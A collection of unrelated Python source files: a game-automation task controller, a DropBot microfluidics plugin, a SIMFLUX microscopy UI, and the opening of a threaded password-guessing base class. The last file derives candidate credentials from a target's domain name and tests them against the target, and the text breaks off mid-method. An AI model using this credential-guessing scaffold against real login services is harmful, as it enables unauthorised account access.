self.taskRecord = None
        # Initialization state flags
self.initIng = False
self.neuralNetworksInited = False
if len(tf.config.experimental.list_physical_devices('GPU')) > 0:
self.operate.interface.setConfig(dynamicMemory=True)
def initModelFile(self):
icModelConfig = self.modelConfig["imageClassificationModel"]
icPath = icModelConfig["dir"]
icModelFileName = icModelConfig["fileName"]
icModelSplitFiles = icModelConfig["files"]
if not os.path.exists(os.path.join(icPath, icModelFileName)):
file = File()
file.mergedFile(icPath, icModelFileName, icModelSplitFiles)
hash_str_cal = self.file_hash(os.path.join(icPath, icModelFileName), hashlib.sha256)
with open(os.path.join(icPath, icModelFileName + ".sha256"), "r") as f:
hash_str_source = f.read()
if hash_str_cal != hash_str_source:
raise Exception("文件合并失败")
@staticmethod
def file_hash(file_path: str, hash_method) -> str:
if not os.path.isfile(file_path):
            print('File does not exist.')
return ''
h = hash_method()
with open(file_path, 'rb') as f:
for chunk in iter(lambda: f.read(8192), b''):
h.update(chunk)
return h.hexdigest()
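    # Example use (hypothetical path): Distributor.file_hash("model.pb", hashlib.sha256)
    # returns the hex SHA-256 digest of model.pb, reading it in 8 KiB chunks so large model
    # files never have to be loaded into memory at once.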
def initDevice(self, device_name=None):
self.initIng = True
automation = Automation(self.operate, self.labelsName, None)
automation.loadGame(device_name=device_name)
self.automation = automation
self.initIng = False
def connectToIPAddress(self, ipAddress):
self.operate.deviceManager.connectToIPAddress(ipAddress)
def initNeuralNetworks(self, enableGPU=False, gpuMemoryLimit=None):
self.initModelFile()
if enableGPU:
logger.info("已启用GPU加速模式")
logger.info("正在检查GPU设备")
sysInfo = self.getSystemInfo()
if len(sysInfo["GPU"]) < 1:
logger.error("未检测到GPU设备")
logger.error("请检是否安装了对应的CUDA和cuDNN驱动")
logger.error("无法启动GPU加速")
logger.warning("切换为CPU模式")
self.operate.interface.setConfig(GPULimit=True)
self.operate.initModel()
else:
if gpuMemoryLimit == "dynamic":
self.operate.interface.setConfig(dynamicMemory=True)
logger.info("GPU设置为动态显存")
else:
gpuMemoryLimit *= sysInfo["GPU"][0]["memoryValue"]
gpuMemoryLimit = int(gpuMemoryLimit)
self.operate.interface.setConfig(Memory=gpuMemoryLimit)
logger.info("GPU显存被限制为{}MB".format(gpuMemoryLimit))
logger.debug(f"GPU设备: {sysInfo['GPU'][0]['description']} 已启用")
self.operate.initModel(enableGPU=True, ocrMemory=2048)
else:
logger.info("初始化CPU设备...")
self.operate.interface.setConfig(GPULimit=True)
self.operate.initModel()
self.neuralNetworksInited = True
def newSingleTask(self, frequency, sanityTimes: int = 0, useStone: bool = False):
task = Task(frequency, sanityTimes, useStone)
self.taskRecord = task.copy()
self.automation.reset(task)
self.mainThread = threading.Thread(target=self.automation.mainLoop, args=(self.eventTaskEnd,))
self.mainThread.start()
self.taskType = "Single"
self.taskBuffer.taskType = "single"
self.taskBuffer.singleTask.frequency = frequency
self.taskBuffer.singleTask.sanityTimes = sanityTimes
self.taskBuffer.singleTask.useStone = useStone
self.taskBuffer.save(self.taskBufferPath)
def newContinuousTask(self, intervalTime, frequency, sanityTimes: int = 0, useStone: bool = False, minStartMultiple: int = 2):
task = Task(frequency, sanityTimes, useStone)
self.taskRecord = task.copy()
self.automation.reset(task)
self.continuousTask = ContinuousTask(self.automation, intervalTime, minStartMultiple)
self.mainThread = threading.Thread(target=self.continuousTask.run, args=(self.eventTaskEnd,))
self.mainThread.start()
self.taskType = "Continuous"
self.taskBuffer.taskType = "continuousTask"
self.taskBuffer.continuousTask.intervalTime = int(intervalTime / 60)
self.taskBuffer.continuousTask.inlineSingleTask.frequency = frequency
self.taskBuffer.continuousTask.inlineSingleTask.sanityTimes = sanityTimes
self.taskBuffer.continuousTask.inlineSingleTask.useStone = useStone
self.taskBuffer.continuousTask.minStartMultiple = minStartMultiple
self.taskBuffer.save(self.taskBufferPath)
def stopTask(self):
self.taskRecord = None
if self.taskType == "Single":
self.automation.stop()
elif self.taskType == "Continuous":
self.continuousTask.stop()
def bindTaskEndCallback(self, callback):
self.taskEndCallback = callback
def eventTaskEnd(self):
self.taskRecord = None
self.taskEndCallback()
self.taskType = "UNKNOWN"
def updateScreenInfo(self):
try:
self.automation.updateScreenInfo()
except Exception as e:
logger.error(e)
def saveTaskConfig(self):
self.taskBuffer.save(self.taskBufferPath)
def disconnectDevice(self):
self.automation.operate.releaseDevices()
def getInformation(self):
return {
"Performance": recoder.Recoder.getDataset(),
"Task": (self.automation.task.getTaskInfo() if self.automation.task is not None else None) if self.automation is not None else None,
"Screen": self.automation.screen if self.automation is not None else None,
"Resolution": self.automation.operate.getResolution() if self.automation is not None else None,
"DeviceName": self.automation.operate.getDeviceName() if self.automation is not None else None,
"NeuralNetworksStatus": self.neuralNetworksInited,
"ContinuousTask": self.continuousTask.status if self.continuousTask is not None else None,
"TaskType": self.taskType,
"TaskStatus": self.taskType if self.taskType == "UNKNOWN" else (str(self.automation.isRun) if self.taskType == "Single" else self.continuousTask.status),
"LevelInfo": self.automation.getScreenInfo() if self.automation is not None else None,
"FightProgress": self.automation.progress if self.automation is not None else None,
"TaskProgress": [self.automation.task.frequency, self.taskRecord.frequency] if self.taskRecord is not None and self.automation is not None else None,
"TaskBuffer": self.taskBuffer.getAsDict() if self.taskBuffer is not None else None,
"ADBStatus": {"Status": "connecting", "Device": ""} if self.initIng else (
self.automation.operate.getDevicesConnectionStatus() if self.automation is not None else {"Status": "disconnected", "Device": ""}),
}
def getSystemInfo(self):
results = {"CPU": [], "GPU": []}
physical_devices = GPUtil.getGPUs()
pc_mem = psutil.virtual_memory()
for cpu in tf.config.experimental.list_physical_devices('CPU'):
results["CPU"].append({"name": cpu.name, "maxMemory": self.memoryToString(pc_mem.available), "memoryValue": float(pc_mem.available)})
index = 0
for gpu in tf.config.experimental.list_physical_devices('GPU'):
results["GPU"].append({"name": gpu.name, "maxMemory": self.memoryToString(physical_devices[index].memoryFree * 1024 * 1024), "memoryValue": float(physical_devices[index].memoryFree),
"description": physical_devices[index].name})
index += 1
return results
@staticmethod
def memoryToString(memory: int):
if memory < 1024:
return str(memory) + "B"
elif memory < 1024 * 1024:
return str(round(memory / 1024, 2)) + "KB"
elif memory < 1024 * 1024 * 1024:
return str(round(memory / 1024 / 1024, 2)) + "MB"
else:
return str(round(memory / 1024 / 1024 / 1024, 2)) + "GB"
class TaskBuffer:
def __init__(self, **kwargs):
self.singleTask: TaskBuffer.SingleTask = kwargs.get("singleTask", TaskBuffer.SingleTask())
self.continuousTask: TaskBuffer.ContinuousTask = kwargs.get("continuousTask", TaskBuffer.ContinuousTask())
self.taskType: str = kwargs.get("taskType", "single")
def load(self, path):
if not os.path.exists(path):
with open(path, "w") as f:
f.write('{"singleTask": {}, "continuousTask": {}}')
try:
with open(path, "r") as f:
data = json.load(f)
self.singleTask = TaskBuffer.SingleTask(**data["singleTask"])
self.continuousTask = TaskBuffer.ContinuousTask(**data["continuousTask"])
except Exception as e:
logger.error(e)
def save(self, path):
with open(path, "w") as f:
json.dump({
"singleTask": self.singleTask.__dict__,
"continuousTask": self.continuousTask.getAsDict(),
"taskType": self.taskType
}, f)
def getAsDict(self):
return {
"singleTask": self.singleTask.__dict__,
"continuousTask": self.continuousTask.getAsDict(),
"taskType": self.taskType
}
class SingleTask:
def __init__(self, **kwargs):
self.frequency = kwargs.get("frequency", 3)
self.sanityTimes = kwargs.get("sanityTimes", 0)
self.useStone = kwargs.get("useStone", False)
class ContinuousTask:
def __init__(self, **kwargs):
self.intervalTime = kwargs.get("intervalTime", 180)
self.minStartMultiple = kwargs.get("minStartMultiple", 1)
self.inlineSingleTask: TaskBuffer.SingleTask = TaskBuffer.SingleTask(**kwargs.get("inlineSingleTask", {}))
def getAsDict(self):
return {
"intervalTime": self.intervalTime,
"minStartMultiple": self.minStartMultiple,
"inlineSingleTask": self.inlineSingleTask.__dict__
}
|
__init__.py
|
import asyncio
import json
import threading
from threading import Thread
import numpy as np
import pydash as _
from si_prefix import si_format, si_parse
from dropbot import SerialProxy
from micropede.client import MicropedeClient, dump_stack
from micropede.async import MicropedeAsync
SCHEMA = {
"type": "object",
"properties": {
"voltage": {
"type": "number",
"default": 100,
"per_step": True
},
"frequency": {
"type": "number",
"default": 10000,
"per_step": False
},
"__hv_output_enabled__": {
"type": "boolean",
"default": False
},
"__hv_output_selected__": {
"type": "boolean",
"default": True
},
"__channel_count__": {
"type": "integer",
"default": 0
},
"__capacitance_update_interval_ms__": {
"type": "integer",
"default": 0,
"minimum": 0
},
"__target_capacitance__": {
"type": "number",
"default": 0
}
}
}
def setup_serial_proxy(self):
class Y(object): pass
Y.control_board = None
Y.ready_event = threading.Event()
Y.err = False
def start_thread(x):
try:
x.control_board = SerialProxy()
except Exception as e:
x.err = e
x.ready_event.set()
t = Thread(target=start_thread, args=(Y,))
t.start()
Y.ready_event.wait()
if (Y.err):
raise(Y.err)
self.control_board = Y.control_board
APPNAME = "scicad"
class DropBot(MicropedeClient):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
async def update_board_info(self):
info = {}
_.assign(info, json.loads(self.control_board.config.to_json()))
_.assign(info, json.loads(self.control_board.state.to_json()))
_.assign(info, json.loads(self.control_board.properties.to_json()))
_.assign(info, {"uuid": str(self.control_board.uuid)})
await self.set_state('info', info)
def listen(self):
setup_serial_proxy(self)
self.control_board.hv_output_enabled = True
self.control_board.hv_output_selected = True
self.on_put_msg("frequency", self.put_frequency)
self.on_put_msg("voltage", self.put_voltage)
self.on_trigger_msg("connect-dropbot", self.connect_dropbot)
self.on_trigger_msg("measure-capacitance", self.measure_capacitance)
self.on_trigger_msg("measure-voltage", self.measure_voltage)
self.on_trigger_msg("put-voltage-frequency", self.put_voltage_frequency)
self.on_state_msg("electrodes-model", "active-electrodes", self.turn_on_electrodes)
self.on_state_msg("electrodes-model", "voltage", self.change_voltage)
self.on_state_msg("electrodes-model", "frequency", self.change_frequency)
self.on_state_msg("dropbot-ui-plugin", "{key}", self.modify_status)
self.wait_for(self.update_board_info())
async def change_voltage(self, voltage, params):
try:
print("CHANGING :) VOLTAGE!!!")
# Convert payload from si_unit string to number
print("CALLING PSI PARSE:", voltage);
voltage = si_parse(_.replace(voltage, "V", ""))
print("ITS NOW: ", voltage)
await self.put_voltage({"voltage": voltage}, {})
await self.update_board_info()
except Exception as e:
print("Error setting voltage")
print(e)
async def change_frequency(self, frequency, params):
try:
print("FREQ", frequency)
frequency = si_parse(_.replace(frequency, "Hz", ""))
await self.put_frequency({"frequency": frequency}, params)
await self.update_board_info()
except Exception as e:
print("Error setting frequency")
print(e)
async def put_voltage_frequency(self, payload, params):
self.control_board.voltage = float(payload["voltage"])
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
async def turn_on_electrodes(self, payload, params):
# Get the three object from device-model
scicad = MicropedeAsync(APPNAME,port=self.port,loop=self.loop)
three_object = await scicad.get_state('device-model', 'three-object')
active_electrodes = payload
def active_filter(obj):
return _.includes(active_electrodes, obj["id"])
active_objects = _.filter_(three_object, active_filter)
channels = _.map_(_.map_(active_objects, "channel"), int)
max_channels = self.control_board.number_of_channels
channel_states = np.zeros(max_channels, dtype=int)
channel_states[channels] = 1
self.control_board.set_state_of_channels(channel_states)
print(self.control_board.state_of_channels)
await self.update_board_info()
async def measure_voltage(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
voltage = self.control_board.measure_voltage()
self.notify_sender(payload, voltage, "measure-voltage")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-voltage", "failed")
async def measure_capacitance(self, payload, params):
try:
if (not self.control_board):
raise("Control board not set")
capacitance = self.control_board.measure_capacitance()
self.notify_sender(payload, capacitance, "measure-capacitance")
except Exception as e:
self.notify_sender(payload, dump_stack(self.name, e),
"measure-capacitance", "failed")
async def connect_dropbot(self, payload, params):
try:
setup_serial_proxy(self)
await self.update_board_info()
self.notify_sender(payload, "connected!", "connect-dropbot")
except Exception as e:
print("ERROR::", e)
self.notify_sender(payload, dump_stack(self.name, e),
"connect-dropbot", "failed")
async def put_frequency(self, payload, params):
""" Set the switching frequency of the active fluxels"""
try:
self.validate_schema(payload)
self.control_board.frequency = float(payload["frequency"])
await self.update_board_info()
self.notify_sender(payload, self.control_board.frequency, "frequency")
except Exception as e:
print(e)
            self.notify_sender(payload, dump_stack(self.name, e),
"frequency", "failed")
async def put_voltage(self, payload, params):
""" Set the on voltage for fluxels"""
try:
print("PUT VOLTAGE CALLED!")
self.validate_schema(payload)
self.control_board.voltage = float(payload["voltage"])
print("SETTING STATE OF VOLTAGE TO:", payload["voltage"])
print("SETTING STATE!!")
await self.update_board_info()
print("SET SUCCESSFUL")
self.notify_sender(payload, self.control_board.voltage, "voltage")
except Exception as e:
print(e)
            self.notify_sender(payload, dump_stack(self.name, e),
"voltage", "failed")
print("Running dropbot plugin")
dropbot = DropBot("scicad", host="localhost", port=1884, name="dropbot")
|
app.py
|
import sys, os
#if __name__ == "__main__":
# basedir=os.path.abspath(os.path.dirname(__file__) + '/../..')
# print(basedir)
# os.chdir(basedir)
# sys.path.append(basedir)
import numpy as np
import tqdm
from PyQt5.QtWidgets import QApplication, QLineEdit, QFileDialog, QDialog,QVBoxLayout
from PyQt5 import QtCore, QtWidgets
from PyQt5.QtCore import pyqtSlot
import time
import matplotlib.pyplot as plt
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import pickle
import simflux.ui.main_ui as main_ui
import simflux.ui.linklocs_ui as linklocs_ui
from simflux.ui.progressbar import ProgressBar
import threading
import json
import simflux.tiff_to_locs as tiff_to_locs
import simflux.extract_rois as extract_rois
from smlmlib.util import imshow_hstack
import simflux.locs_to_pattern as simflux_pattern
from simflux.ui.drift_correct_dlg import DriftCorrectionDialog
class LinkLocsDialog(QDialog):
def __init__(self, parent):
super().__init__(parent)
self.ui = linklocs_ui.Ui_Dialog()
self.ui.setupUi(self)
self.ui.btnBrowse.clicked.connect(self._onBrowse)
self.ui.btnEstimate.clicked.connect(self.estimate)
def setLocsFile(self,fn):
self.ui.txtLocsFile.setText(fn)
def _onBrowse(self):
options = QFileDialog.Options()
# options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileName(self,"", "","All Files (*);;HDF5 Files (*.hdf5)", options=options)
if fileName:
self.ui.txtLocsFile.setText(fileName)
def estimate(self):
from utils.link_locs import estimate_on_time
maxdist = self.ui.maxDistance.value()
frameskip = self.ui.frameskip.value()
fig,bins,framecounts = estimate_on_time(self.ui.txtLocsFile.text(),maxdist,frameskip)
import simflux.ui.qtplot as qtplot
plotdlg=qtplot.PlotDialog(fig,self)
plotdlg.setModal(True)
plotdlg.show()
def getWidgetValues(widgets):
d={}
for w in widgets:
if type(w) == QtWidgets.QDoubleSpinBox or type(w) == QtWidgets.QSpinBox:
v = w.value()
elif type(w) == QLineEdit:
v = w.text()
else:
continue
d[w.objectName()] = v
return d
def setWidgetValues(widgets,values):
for w in widgets:
if w.objectName() in values:
v = values[w.objectName()]
if type(w) == QtWidgets.QDoubleSpinBox or type(w) == QtWidgets.QSpinBox:
w.setValue(v)
elif type(w) == QLineEdit:
w.setText(v)
class Window(QDialog):
localizeDone = QtCore.pyqtSignal()
roiExtractionDone = QtCore.pyqtSignal()
def __init__(self):
super().__init__()
self.title = 'SIMFLUX Viewer'
self.ui = main_ui.Ui_Dialog()
ui=self.ui
ui.setupUi(self)
ui.btnBrowseTiff.clicked.connect(self.onBrowseTiff)
ui.btnEstimAnglePitch.clicked.connect(self.estimAnglePitch)
ui.btnEstimPhaseDepth.clicked.connect(self.estimPhaseDepth)
ui.btnLocalize.clicked.connect(self.localize)
ui.btnLinkLocs.clicked.connect(self.linklocs)
ui.btnBrowseCameraOffset.clicked.connect(self.onBrowseCameraOffsetFile)
ui.btnBrowseROIs.clicked.connect(self.onBrowseROIFile)
ui.btnFixDepth.clicked.connect(self.onFixDepth)
ui.btnDriftCorrection.clicked.connect(self.onDriftCorrection)
ui.btnExtractROIs.clicked.connect(self.onExtractROIs)
ui.btnLoadMod.clicked.connect(self.onLoadMod)
ui.btnSaveMod.clicked.connect(self.onSaveMod)
ui.btnRunSimflux.clicked.connect(self.simflux)
self.localizeDone.connect(self.onLocalizeDone)
self.roiExtractionDone.connect(self.onROIExtractionDone)
self.cfgFile = 'simflux/ui/ui-cfg.json'
self.cfgWidgets = {
ui.fixDepth,
ui.roisize,
ui.gain,
ui.offset,
ui.detectionThreshold,
ui.maxpitch,
ui.minpitch,
ui.numPhaseSteps,
ui.pixelsize,
ui.psfSigmaX, ui.psfSigmaY,
ui.tiffPath,
ui.smlmLocsFile,
ui.txtCameraOffsetFile,
ui.startFrame,
ui.maxLinkDistance,
ui.maxLinkFrameskip,
ui.txtROIFile,
ui.roiExtractMinSpotFrames,
ui.roiExtractSpotFrames,
ui.roiExtractAppend,
ui.maxLinkDistanceIntensity,
ui.angle0, ui.angle1, ui.pitch0, ui.pitch1
}
self.load()
def onDriftCorrection(self):
dlg = DriftCorrectionDialog(self, self.ui.smlmLocsFile.text())
dlg.show()
def load(self):
path = os.path.abspath(os.curdir+"/"+self.cfgFile)
print(f"Loading UI state from {path}")
if os.path.exists(self.cfgFile):
with open(self.cfgFile,'r') as f:
d = json.load(f)
setWidgetValues(self.cfgWidgets,d)
def save(self):
d = getWidgetValues(self.cfgWidgets)
with open(self.cfgFile,'w') as f:
json.dump(d,f,indent=4)
def closeEvent(self,event):
self.save()
def linklocs(self):
dlg = LinkLocsDialog(self)
dlg.setLocsFile(self.ui.smlmLocsFile.text())
dlg.show()
def updatePaths(self):
tiff_path = self.ui.tiffPath.text()
locs_fn = os.path.splitext(tiff_path)[0]+".hdf5"
self.ui.smlmLocsFile.setText(locs_fn)
rois_path = os.path.splitext(tiff_path)[0]+".rois"
self.ui.txtROIFile.setText(rois_path)
def onBrowseCameraOffsetFile(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse image/movie to use as offset:", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.txtCameraOffsetFile.setText(fileName)
def onBrowseROIFile(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse ROI file", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.txtROIFile.setText(fileName)
def onBrowseTiff(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse TIFF", "","All Files (*);;TIFF File (*.tif)", options=options)
if fileName:
self.ui.tiffPath.setText(fileName)
self.updatePaths()
def onLoadMod(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getOpenFileName(self,"Browse mod pickle", "","All Files (*);;Pickle files (*.pickle)", options=options)
if fileName:
with open(fileName, "rb") as pf:
mod = pickle.load(pf)['mod']
self.setModulation(mod)
def onSaveMod(self):
options = QFileDialog.Options()
fileName, _ = QFileDialog.getSaveFileName(self,"Browse mod pickle", "","All Files (*);;Pickle files (*.pickle)", options=options)
if fileName:
mod = self.getModulation()
            phase, depth, relint = self.getPhaseAndDepth()
angle, pitch = self.getAngleAndPitch()
mod_info = {"mod": mod, "pitch": pitch, "angles": angle, "phase": phase, "depth": depth}
with open(fileName, "wb") as df:
pickle.dump(mod_info, df)
def getModulation(self):
angles,pitch = self.getAngleAndPitch()
phase,depth,relint = self.getPhaseAndDepth()
return simflux_pattern.compute_mod(self.getPatternFrames(), angles, pitch, phase, depth, relint)
def setModulation(self, mod):
angles,pitch = simflux_pattern.mod_angle_and_pitch(mod,self.getPatternFrames())
pf = self.getPatternFrames()
self.setAngleAndPitch(angles,pitch)
self.setPhaseDepth(mod[:,3][pf], mod[:,2][pf], mod[:,4][pf])
def getPatternFrames(self):
phase_steps=self.ui.numPhaseSteps.value()
pattern_frames=np.array([np.arange(0,phase_steps*2,2),np.arange(0,phase_steps*2,2)+1])
return pattern_frames
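    # Sketch of the layout produced by getPatternFrames above (assuming 3 phase steps, a
    # hypothetical value): pattern_frames == [[0, 2, 4], [1, 3, 5]] -- even frame indices
    # belong to the first illumination axis, odd indices to the second.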
def estimAnglePitch(self):
freq_minmax=[2*np.pi/self.ui.maxpitch.value(),2*np.pi/self.ui.minpitch.value()]
pattern_frames=self.getPatternFrames()
angles,pitch=simflux_pattern.estimate_pitch_and_angle(self.ui.smlmLocsFile.text(),pattern_frames,freq_minmax)
self.setAngleAndPitch(angles,pitch)
def onExtractROIs(self):
locs_fn = self.ui.smlmLocsFile.text()
tiff_path = self.ui.tiffPath.text()
rois_path = self.ui.txtROIFile.text()
pbar = ProgressBar("Extracting ROIs and estimating spot background and intensity")
def progress_update(msg,done):
if msg is not None:
pbar.setMsg.emit(msg)
if done is not None:
pbar.update.emit(done)
return not pbar.abortPressed
cfg = self.getConfig()
cfg = {**cfg,
'maxlinkdistXY': self.ui.maxLinkDistance.value(),
'maxlinkdistI': self.ui.maxLinkDistanceIntensity.value(),
'maxlinkframeskip': self.ui.maxLinkFrameskip.value()
}
maxroiframes = self.ui.roiExtractSpotFrames.value()
minroiframes = self.ui.roiExtractMinSpotFrames.value()
appendFrames = self.ui.roiExtractAppend.value()
def process_thread():
self.rois,self.roiframes = extract_rois.extract_rois(rois_path, tiff_path, cfg, minroiframes,
maxroiframes, appendFrames, locs_fn, progress_update)
if not pbar.abortPressed:
self.roiExtractionDone.emit()
t = threading.Thread(target=process_thread)
t.start()
pbar.show()
def onViewROIs(self):
rois_path = self.ui.txtROIFile.text()
roidata = extract_rois.ROIData.load(rois_path)
plt.figure()
for k in range(20):
imshow_hstack(roidata.frames[k])
def setAngleAndPitch(self,angles,pitch):
ad = np.rad2deg(angles)
pixelsize = self.ui.pixelsize.value()
p = pitch*pixelsize
self.ui.angle0.setValue(ad[0])
self.ui.angle1.setValue(ad[1])
self.ui.pitch0.setValue(p[0])
self.ui.pitch1.setValue(p[1])
def onFixDepth(self):
phase,depth,relint=self.getPhaseAndDepth()
depth[:,:]=self.ui.fixDepth.value()
self.setPhaseDepth(phase,depth,relint)
def getAngleAndPitch(self):
angle = np.array( [ self.ui.angle0.value(), self.ui.angle1.value() ] )
pitch = np.array( [ self.ui.pitch0.value(), self.ui.pitch1.value() ] )
angle = np.deg2rad(angle)
pitch_in_pixels = pitch / self.ui.pixelsize.value()
return angle,pitch_in_pixels
def estimPhaseDepth(self):
locs_fn = self.ui.smlmLocsFile.text()
angle,pitch = self.getAngleAndPitch()
pattern_frames = self.getPatternFrames()
phase, depth, relint = simflux_pattern.estimate_phase_and_depth(locs_fn, angle, pitch, pattern_frames)
self.setPhaseDepth(phase,depth,relint)
def setPhaseDepth(self,phase,depth,relint):
tbl = self.ui.tableMod
pattern_frames = self.getPatternFrames()
phase_steps = self.ui.numPhaseSteps.value()
tbl.setRowCount(len(pattern_frames.flatten()))
tbl.setColumnCount(4)
headers = ['Axis', 'Phase (deg)', 'Depth', 'Rel. intensity']
tbl.setHorizontalHeaderLabels(headers)
phase = np.rad2deg(phase)
for i, pf in enumerate(pattern_frames):
for step, fn in enumerate(pf):
lbl = QtWidgets.QLabel()
lbl.setText(str(i))
tbl.setCellWidget(i*phase_steps+step, 0, lbl)
w = QtWidgets.QLabel()
w.setText(f"{phase[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 1, w)
w = QtWidgets.QLabel()
w.setText(f"{depth[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 2, w)
w = QtWidgets.QLabel()
w.setText(f"{relint[i,step]:.5f}")
tbl.setCellWidget(i*phase_steps+step, 3, w)
def getPhaseAndDepth(self):
tbl = self.ui.tableMod
pattern_frames = self.getPatternFrames()
numaxis = len(pattern_frames)
numsteps = self.ui.numPhaseSteps.value()
phase = np.zeros((numaxis,numsteps))
depth = np.zeros((numaxis,numsteps))
relint = np.zeros((numaxis,numsteps))
for i in range(numaxis):
for j in range(numsteps):
phase[i,j]=float(tbl.cellWidget(i*numsteps+j,1).text())
depth[i,j]=float(tbl.cellWidget(i*numsteps+j,2).text())
relint[i,j]=float(tbl.cellWidget(i*numsteps+j,3).text())
return np.deg2rad(phase),depth,relint
def getConfig(self):
offset = self.ui.offset.value()
offsetFile = self.ui.txtCameraOffsetFile.text()
if len(offsetFile)>0:
offset = offsetFile
sigmaX= self.ui.psfSigmaX.value()
sigmaY = self.ui.psfSigmaY.value()
cfg = {
'sigma': [sigmaX, sigmaY],
'roisize': self.ui.roisize.value(),
'threshold': self.ui.detectionThreshold.value(),
'gain': self.ui.gain.value(),
'offset': offset,
'startframe': self.ui.startFrame.value()
}
return cfg
def simflux(self):
rois_path = self.ui.txtROIFile.text()
sf_fn = os.path.splitext(rois_path)[0]+"_sf.hdf5"
g2d_fn = os.path.splitext(rois_path)[0]+"_g2d.hdf5"
sigma = self.getConfig()['sigma']
mod = self.getModulation()
rd = extract_rois.ROIData.load(rois_path)
print(f"Estimating with 2D Gauss..")
results = extract_rois.localize(rd.rois,rd.frames,sigma,mod=None)
results.SaveHDF5(g2d_fn, rd.imgshape)
print(f"Estimating with SIMFLUX..")
results = extract_rois.localize(rd.rois,rd.frames,sigma,mod=mod)
results.SaveHDF5(sf_fn, rd.imgshape)
def localize(self):
tiff_path = self.ui.tiffPath.text()
if not os.path.exists(tiff_path):
return
cfg = self.getConfig()
locs_fn = self.ui.smlmLocsFile.text()
est_sigma = self.ui.checkEstimSigma.isChecked()
self.ui.labelLocsInfo.setText('')
pbar = ProgressBar("Running spot detection and 2D Gaussian localization...")
def progress_update(msg,done):
if msg is not None:
pbar.setMsg.emit(msg)
if done is not None:
pbar.update.emit(done)
return not pbar.abortPressed
def localize_thread():
print (f"Localize thread: {threading.get_ident()}")
self.results, self.imgshape = tiff_to_locs.localize(tiff_path, cfg, locs_fn, progress_update, est_sigma)
if not pbar.abortPressed:
self.localizeDone.emit()
t = threading.Thread(target=localize_thread)
t.start()
pbar.show()
@QtCore.pyqtSlot()
def onLocalizeDone(self):
print("localize done")
if 'sx' in self.results.colnames:
sx = self.results.estim[:, self.results.ColIdx('sx')]
sy = self.results.estim[:, self.results.ColIdx('sy')]
self.ui.psfSigmaX.setValue(np.median(sx))
self.ui.psfSigmaY.setValue(np.median(sy))
plt.figure()
plt.hist([sx,sy],label=['Sigma X','Sigma Y'],range=(1,3),bins=30)
plt.legend()
plt.xlabel('PSF Sigma [pixels]')
plt.show()
self.showLocsInfo()
@QtCore.pyqtSlot()
def onROIExtractionDone(self):
print("roi extraction done")
def showLocsInfo(self):
m_crlb_x = np.median(self.results.CRLB()[:,0])
m_bg= np.median(self.results.estim[:,3])
self.ui.labelLocsInfo.setText(f"#Spots: {len(self.results.estim)}. Imgsize:{self.imgshape[0]}x{self.imgshape[1]} pixels. Median CRLB X: {m_crlb_x:.2f} [pixels], bg:{m_bg:.1f}")
def run_ui():
app = QApplication.instance()
if app is None:
app = QApplication(sys.argv)
wnd = Window()
wnd.show()
wnd.activateWindow()
app.exec_()
# del tqdm # prevent exception at exit about not being able to join thread
del app # prevent IPython+Qt issue https://github.com/spyder-ide/spyder/issues/2970
if __name__ == '__main__':
run_ui()
|
PasswordCheckBase.py
|
# -*- coding: utf-8 -*-
# !/usr/bin/env/ python3
"""
Author: Rookie
E-mail: hyll8882019@outlook.com
"""
import tldextract
from collections import deque
from threading import Thread
from concurrent.futures import ThreadPoolExecutor
from urllib.parse import urlparse
from RookieTools.CheckBase import CheckBase, abstractmethod
from RookieTools.logger import logger
from RookieTools import show_run_time, is_url
import warnings
class PassWordCheckBase(CheckBase):
PluginName = None
ThreadNumber = 10
DEBUG = False
def __init__(self, target: str, *args, **kwargs):
self.url = target
self.result = None
self.username_task = deque()
self.password_task = deque()
self.__password_task = None
super(PassWordCheckBase, self).__init__()
@abstractmethod
def init_check(self) -> bool:
pass
@abstractmethod
def tasks_init(self):
pass
@abstractmethod
def check(self, username, password) -> bool:
pass
def init_domain_pass(self, is_user: bool = True, is_pass: bool = True):
if not is_url(self.url.lower()):
self.url = 'http://' + self.url.lower()
try:
domain = urlparse(self.url).netloc
except ValueError:
            logger.warning('failed to parse URL: %s' % self.url)
return
tld = tldextract.extract(domain)
sub_domain = tld.subdomain
if '.' in sub_domain:
sub_domain = sub_domain.split('.')
else:
sub_domain = [sub_domain, ]
domains = [
'%s' % tld.domain,
'%s%s' % (tld.domain, tld.suffix), '%s%s%s' % (''.join(sub_domain), tld.domain, tld.suffix),
'%s_%s' % (tld.domain, tld.suffix), '%s_%s_%s' % ('_'.join(sub_domain), tld.domain, tld.suffix),
'%s.%s' % (tld.domain, tld.suffix), '%s.%s.%s' % ('.'.join(sub_domain), tld.domain, tld.suffix)
]
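        # Example of the candidates built above for a hypothetical target
        # "http://mail.example.com" (subdomain "mail", domain "example", suffix "com"):
        #   'example', 'examplecom', 'mailexamplecom',
        #   'example_com', 'mail_example_com',
        #   'example.com', 'mail.example.com'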
if is_user:
[self.username_task.append(i) for i in domains]
if is_pass:
[self.password_task.append(i) for i in domains]
def clean_tasks(self):
with self.task_lock:
if len(self.password_task) or len(self.username_task):
                logger.info('% -40s clearing the task queue, please wait...' % self.url)
self.username_task.clear()
self.password_task.clear()
if self.__password_task:
self.__password_task.clear()
def is_exist(self):
return self.result is not None
def work_in(self, username: str, *args, **kwargs):
while True:
try:
password = self.__password_task.popleft()
except IndexError:
break
if self.check(username, password) and self.result:
with self.file_lock:
self.pipe(self.result)
self.clean_tasks()
@abstractmethod
def pipe(self, result):
pass
@show_run_time('PasswordCheck')
def run(self):
status = self.init_check()
        logger.info('% -40s %s %s' % (self.url, self.PluginName, 'initial check passed' if status else 'initial check failed'))
if status:
self.tasks_init()
while True:
try:
username = self.username_task.popleft()
except IndexError:
break
